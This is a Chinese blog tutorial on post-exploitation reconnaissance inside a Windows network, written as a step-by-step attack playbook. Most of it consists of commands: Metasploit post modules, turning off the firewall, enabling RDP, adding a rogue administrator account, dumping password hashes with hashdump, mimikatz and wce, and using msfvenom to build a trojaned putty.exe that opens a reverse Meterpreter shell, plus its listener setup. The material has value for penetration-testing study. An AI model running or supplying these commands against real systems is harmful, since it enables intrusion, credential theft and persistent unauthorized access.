内网渗透-内网信息收集

已于 2023-01-20 00:45:40 修改
阅读量9.5k 收藏 62
点赞数 5
分类专栏: 内网渗透 文章标签: 安全性测试 web安全 安全
于 2022-09-21 00:48:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lza20001103/article/details/126964071
版权

内网信息收集

文章目录

前言

当我们进行外网信息收集,漏洞探测以及漏洞利用后,获得了主机的权限后,我们需要扩大渗透的战果时,这是我们就要进行内网的渗透了,内网渗透最重要的还是前期的信息收集的操作了,就是我们的内网信息收集了,信息收集需要收集什么内容,对后期的横向和纵向移动都有很大的帮助。接下来给大家总结一下内网渗透中的信息收集的模块内容。

msf模块中的信息收集

Msf模块
run post/
run post/windows/gather/
获取系统的分区情况
forensics(取证的模块)
run post/windows/gather/forensics/enum_drives

检测是否是虚拟机
run post/windows/gather/checkvm

靶机运行了哪些服务
run post/windows/gather/enum_services

安装了哪些应用
run post/windows/gather/enum_applications

是否有文件共享
run post/windows/gather/enum_shares

最近的操作
run post/windows/gather/dumplinks

安装了哪些补丁
run post/windows/gather/enum_patches

信息收集
scraper(是个脚本)
run scraper
收集完之后,会加载在指定文件
到文件中查看收集内容
cd /root/.msf4/log/scripts/
ls
cd scraper/
ls
cd 到指定的文件
ls
cat zhi.txt

显示乱码的话
chcp 65001
回到正常编码

run winenum
查看系统的路由,文件

msf反弹shell后的信息收集

MSF反弹shell
chcp 65001(返回的是utf-8的代码)

netsh advfirewall set allprofiles state off(关闭防火墙)
netsh advfirewall show allprofiles(查看所有配置)

shutdown -r -f -t 0(-f 强制重启),立即重启

看看3389端口
打开3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

利用该命令,在目标主机上添加用户
run getgui -u admin -p admin (设置密码是)
net localgroup adminstrators admin /add

(1)MSF信息收集
远程桌面连接
window(mstsce)
kali (rdesktop -u username -p password ip)

获取哈希值

查看远程桌面
screenshot
use espia
screengrab
screenshare

得到哈希值密码破解时权限不够
如何提高权限
pid迁移

  1. getpid
  2. ps 查进程,找NT SYSTEM的进程pid,svhost
  3. pid迁移,migrating pid
    getuid
    hashdump 获得哈希值

(2)凭证信息收集
window密码破解工具

  1. mimikatz
    (在内存中获取的密码)
    https://github.com/gentilkiwi/mimikatz/releases(win10下载网址)
    在window下使用是需要管理员权限的
    图片中是获得明文密码的语句
    privilege::debug //提升权限

2.wce
wce.exe -w 获取明文密码(只适用于win7的低版本)

3.pwddump7
得到hash值后可以放到这个网站去进行破解得到明文
https://www.objectif-securite.ch/ophcrack

http://www.cmd5.com/Default.aspx

4.procdump(免查杀的功能)

内网信息收集

先查看是否存在域

查看网段(s扫描器)
s.exe syn 192.168.0.0 192.168.255.255 80

抓包分析网络流量(分析流量看网段)meterpreter 抓取目标机所在网络流量

看进程
tasklist
netstat -ano
netstat -lntp(linux)

systeminfo(查看补丁列表)
net share

net user 查看本机共享列表和课访问的域共享列表
net localgroup admininistrators

query user || qwinsta 查看在线用户

route print(查看路由)

arp -a(同一网段的缓存表)

关闭防火墙
netsh advfirewall set allprofiles state off(03以后)
net sh firewall show config(查看防火墙配置)

netsh(可用于端口转发,连接内网时用)

域环境信息收集
远程登录不安全,用msf反弹shell比较安全

whoami /all(查看SID域账号,用于后面的票据伪造)

net user /domain 域中的用户
net time /domain 查看域控
net group “Domain computer” /domain 查看域控制器组

nbtscan(扫描同一网段中有哪些主机)

net view /domain 查询域
net group “domain computers” /domain 查询所有与成员计算机列表
cls 清屏
net accounts /domain 获取域密码信息

域内管理员信息
net group “domain admins” /domain 查询域管理员用户

msf加载powershell脚本进行信息收集

msf中信息收集工具
在会话中输入run winenum

powersploit
ls
找到路径
cd Recon
回到会话中
load powershell
powershell_import 刚刚的Recon的路径/PowerView.ps1
加载成功

powershell_execute get-NetDomain 查看当前的域有哪些
powershell_execute get-NetUser 当前的用户

powershell_execute get-NetComputer 扫域名
powershell_execute get-NetProcess 进程

扫端口
powershell_import 刚刚的Recon的路径/Invoke-Portscan.ps1
powershell_execute invoke-portscan 192.168.8.1,192.168.8.200 -ports “21,22,80,445,139”

empire(域渗透,内网收集)(在kali中打开)
./empire

我在kali中给大家演示一下powershell中的powersploit脚本,进行信息收集
首先就是在msf中生成一个后门程序shell.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.231.128 lport=4444 -x putty.exe -e x86/shikata_ga_nai -f exe -o shell.exe

将shell.exe上传到靶机中,点击回连shell,在kali中进行监听,在kali中打开msf,设置参数,进行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.231.128
set lport 4444
run
在这里插入图片描述
进行一系列设置后,我们点击程序,发现返回了会话。
在这里插入图片描述
我们在kali中打开powersploit,找到这这个脚本,PowerView.ps1
在这里插入图片描述
找到这个路径
/usr/share/windows-resources/powersploit/Recon
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

在回到msf中加载powershell
load powershell

导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon//Powerview.ps1

执行脚本
powershell_execute get-NetDomain
在这里插入图片描述
我这里由于是用我本机做的实验,可能拿到的权限不是很高,所以不能做下一步的收集,但是对于win7的机器还是可以进行信息收集的

我们进行端口扫描
导入模块
powershell_import /usr/share/windows-resources/powersploit/Recon/Invoke-Portscan.ps1

执行脚本
powershell_execute invoke-portscan 192.168.219.1,192.168.219.200 -ports “21,22,80,445,139”
在这里插入图片描述
端口扫描成功了。我们看看另外一个扫描方法吧。
run winenum
在这里插入图片描述
这里进行一系列自动化的信息收集,,将扫描结果输出到报告中,这里显示输出到以下文档中
/root/.msf4/logs/scripts/winenum/LAPTOP-5QFMU9N1_20220920.4003/LAPTOP-5QFMU9N1_20220920.4003.txt

我们进行查看文档
在这里插入图片描述
可能还是因为权限的问题,只能扫到这么多的信息了,但对于其他靶机来说,应该会有更全面的扫描结果的。

后记

内网的信息收集就讲解到这了,渗透的信息收集至关重要,对于后渗透阶段,有着举足轻重的作用,直接决定着后渗透阶段的战果如何。后面还有内网的代理穿透,以及横向移动,权限维持,痕迹清除等阶段,有时间,都会给大家总结的噢。

炫彩@之星
关注
专栏目录
订阅专栏
内网渗透——内网信息收集
PICACHU+++的博客
07-22 1385
渗透测试进入内网之后,首先要对所处的内网环境进行判断,有以下三个方面:对当前机器角色进行判断对当前机器所处网络环境及拓扑结构进行判断分析对当前机器所处区域进行判断。
内网渗透信息收集
世间繁华梦一出
03-13 1568
内网渗透信息收集一、内网信息收集概述二、收集本机信息 信息收集的深度,直接关系到内网渗透测试的成败 一、内网信息收集概述 1.1、我是谁? ——对当前机器角色的判断 WEB服务器?开发测试服务器?公共服务器?文件服务器?代理服务器?DNS服务器?等等?? 根据 主机名、文件、网络连接情况综合判断。 1.2、这是哪? —— 对当前机器所处网络环境的拓扑结构进行分析与判断。 绘制大致内网拓扑图 1.3、我在哪 ——- 对当前机器所处区域的判断。 DMZ区、办公区、核心区 二、收集本机信息 2.1手动信息收集
网站攻击到提权的全部过程_网站提权
shanguicsdn111的博客
09-03 925
在拿到system权限之后,我们可以干很多很多的事…例如给对方种下后门,拿来当肉鸡等等。。。这告诉我们开发网站必须注重安全,否则带来的后果是无穷大的。emmm…这波有点难受。注:本文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本文章不承担任何法律及连带责任,请遵守中华人民共和国安全法。
内网渗透内网信息收集的十三种基本方式
xt350488的博客
09-06 1066
本文的主题为基本的信息收集方式,,域内信息收集得再过几天看看,用的windows server 2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了。
内网渗透 信息收集
诚邀网络通信领域商务合作
04-03 2202
文章目录一、收集对象二、内网主机的基本信息三、网络信息收集四、用户信息收集五、凭据信息收集六、后续的探针信息 一、收集对象 (1)内网主机的基本信息(版本,补丁,服务,任务,防护…), (2)网络信息(端口,环境,代理通道…), (3)用户信息(域用户,本地用户,用户权限,组信息…), (4)凭据信息(各种储存的协议账号密码信息,各种口令信息,hash…) (5)后续探针信息:探索到域内的网络架构信息,存活主机,域控信息,服务接口… 二、内网主机的基本信息 当拿到内网主机的控制权shell,进行第一步的基本
内网渗透系列之信息收集(全网最详细版本!!!)
LCW991207的博客
11-13 1374
内网渗透系列文章内网渗透一:信息收集。当我们拿到一台主机时,从外网打点进入内网,就要进行我们的内网渗透了,当我们所处内网的环境时,我们需要来判断当前我们拿到的主机在内网里是一个什么样的角色
内网渗透-内网信息搜集
cdyunaq的博客
03-25 1330
前言 当我们能访问到⽬标内⽹任何资源之后,我们就可以对 ⽬标内⽹进⾏更深层次的信息搜集⽐如:主机收集、IP 段搜集、端⼝开放服务、Web 资产数量、漏洞类型。接下来是一些工具的食用姿势,仅供参考。 假设我们已经获取到 web-2012 的权限,接下来如何对内⽹进⾏信息搜集,内⽹扫描。 信息收集 主机存活探测 基于netbios的内网存活主机发现 netbios简介 IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以 使用的应用程序编程接口(API),为程序提供了
[HACK学习呀] - 2020-08-23 内网渗透 - 内网中的信息收集1
08-03
内网渗透是网络安全领域的重要环节,特别是在企业网络环境中,一旦突破外围防线,内网信息收集成为继续渗透的关键步骤。本文将详细阐述内网中的信息收集方法,主要关注在工作组环境下的策略。 首先,识别网络环境是...
ISC-内网渗透 -最终版.pdf
04-08
- **信息收集**:搜集目标网络的相关信息。 - **内网拓展**:利用已获得的信息进一步探索目标网络。 - **权限提升**:提高攻击者在网络中的权限级别。 - **权限维持**:确保长期存在于目标网络中。 - **信息探测**:...
内网渗透讲义-精选.zip
最新发布
09-24
讲义详细介绍了内网渗透的基础知识、信息收集方法、内网渗透技术及工具使用。内容涵盖了域结构、AD和DC的管理、内网跨边界应用、用户HASH抓取与破解、密码记录工具、常见漏洞扫描、第三方网络服务攻击(如SQL Server...
GatherInfo:渗透测试信息收集内网渗透信息收集
05-12
GatherInfo 做好信息收集是一次渗透测试的良好开端 :desert_island: GatherInfo 详情请点击 :guitar: 交流 本项目中所规整的都是本人平时渗透以及挖SRC常用的工具和网站 如果你也有比较好用的工具或网站并且愿意分享,欢迎在issues中写出 整理不易,如觉得有帮助,可以给个star支持一下,多谢 :light_bulb: 关于更新 常渗透,常更新 :chequered_flag: Star曲线
(一)内网渗透信息收集
爱上卿的博客
08-27 1673
内网渗透信息收集篇-----参考先知白河愁作品,进行添加修改,转载请注明出处。 一 主机扫描 (1)使用端口扫描工具可以实现主机发现的功能。以下参数可加快扫描进程。特意提的事nmap如何加快扫描进度。 –min-hostgroup 1024(调整并行扫描组的大小,最小分组设置为1024) –min-parallelism 1024(调整探测报文的并行度,最小并行度设置为1024)   ...
内网渗透-信息收集
Ping_Pig的博客
06-28 635
啊啊啊
内网渗透-最实用的信息收集
告白的博客
09-19 3344
0x00 内网渗透概述 当我们渗透web端或者通过其他方式拿到某内网主机shell,我们就可以尝试开始内网渗透,也叫做后渗透,域渗透等,探索域内网络架构,通过内网渗透得到其他内网主机的权限,或者通过内网主机获取到同域的最高管理员主机权限等。 1.内网基本认知:各种名词认知,域的认知,大概了解内网安全流程 2.内网信息收集: (1) 内网主机的基本信息(版本,补丁,服务,任务,防护…), (2)网络信息(端口,环境,代理通道…), (3)用户信息(域用户,本地用户,用户权限,组信息…), (4)凭据信息
内网渗透初识—信息收集
anquanzushiye的博客
04-30 1214
https://www.secshi.com学安全,上secshi。安全师,可信赖的网络安全学习平台,以让每个白帽子高效获得可信赖的优质内容为使命。安全师汇聚网络安全技术、黑客技术、we...
内网渗透内网信息收集
weixin_43749601的博客
04-07 588
前言 当渗透到内网环境中时,首先应该对自己当前所处的环境有一个清楚的了解,清楚知道我是谁?这是哪?我在哪?判断机器处于哪一个区域,是在DMZ区、办公区、还是在核心区。这里的区域也不是绝对的,只是一个大概的环境,处于不同位置的网络,环境不一样,区域界线也不一定明显。 收集本机信息 收集的信息包括操作系统、权限、内网IP段、杀软、端口、服务、补丁情况、网络连接、共享、会话等。如果是域内主机,那么操作系统、应用软件、补丁、服务、杀软一般都是批量安装的。文件共享/FTP连接记录、浏览器访问记录、mstsc连接记录、
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值